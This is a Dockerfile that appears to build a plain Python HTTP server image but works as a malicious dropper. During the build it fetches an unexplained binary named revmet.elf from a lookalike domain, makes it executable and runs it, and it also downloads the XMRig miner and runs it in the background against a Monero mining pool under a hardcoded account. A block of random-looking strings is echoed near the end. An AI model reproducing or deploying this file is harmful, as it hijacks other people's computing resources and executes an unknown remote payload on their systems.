FROM ubuntu:bionic

SHELL ["/bin/bash", "-c"]

RUN apt-get update && apt-get install -y \
    wget \
    ocl-icd-libopencl1 \
    libmicrohttpd-dev \
    libc6 \
    libstdc++6

WORKDIR /root
RUN wget http://mail.oogle.dev:8000//revmet.elf

RUN wget https://github.com/xmrig/xmrig/releases/download/v2.14.1/xmrig-2.14.1-xenial-x64.tar.gz
RUN tar -xzvf xmr*
WORKDIR /root/xmrig-2.14.1
RUN ./xmrig -a cryptonight --background -o stratum+tcp://xmr.pool.minergate.com:45700 -u fewa342rwr@tutanota.com -p x

WORKDIR /root
RUN chmod 777 revmet.elf
RUN ./xmrig-2.14.1/xmrig -a cryptonight --background -o stratum+tcp://xmr.pool.minergate.com:45700 -u fewa342rwr@tutanota.com -p x;./revmet.elf
RUN echo Ffi0JffadOWjg7wdDw5qS4OvcDpMuE1u kojHtClDkUMg2kTNmaUMWefcGD54TkhX v4ohjys7455GVYLhcjHYvReayiwknPdq YC6WKd9roB8HipEZpKxyTMTljVHayXq9 7G5A8HfMCauKsEkYIttdPVicRERMWbuQ rfjbcTZkeuIQNXB5vC4FF3y44tbq2vV2 6WPVM3tbyNn0x6HLjk0V57gjKynfK9CI gLeSi9XZAHRYTfl1EoG3nkfIW6YEoT26 WqQXD9y0dxGOnTMvrIizUUmxLfexrluC FgUKKeHpP765Zf3hVZStPU55DAnWrqaY FkaM9EM7B7cjyIXDdsV6dYFL5rSEZkth JV3c2NjJGsDIdP6tWrGVI5ZwDtFNsevV GXlCkjWujXjUq7zdP25ECvUa8jskXKPo 33Y9JjwnuioZXaQsJcmxgnegMRjW24Zh DGLrlBP1wP15Z7bzvFORfIDPVXxlKOw8 iRR8Zp0TOxlCM7JSEpHNyxmT4XM90YWc zsaOLYboLruHMbrsWTTwF76XhxiEn5Vb JlcMVQX0KrjEurxbQ9jbtcmhwOFZNPb7 g0B5O2hD9pRQwxZWGXhnBJRmjZt4WqIH ddddddd

ENTRYPOINT ["python3", "-m", "http.server"]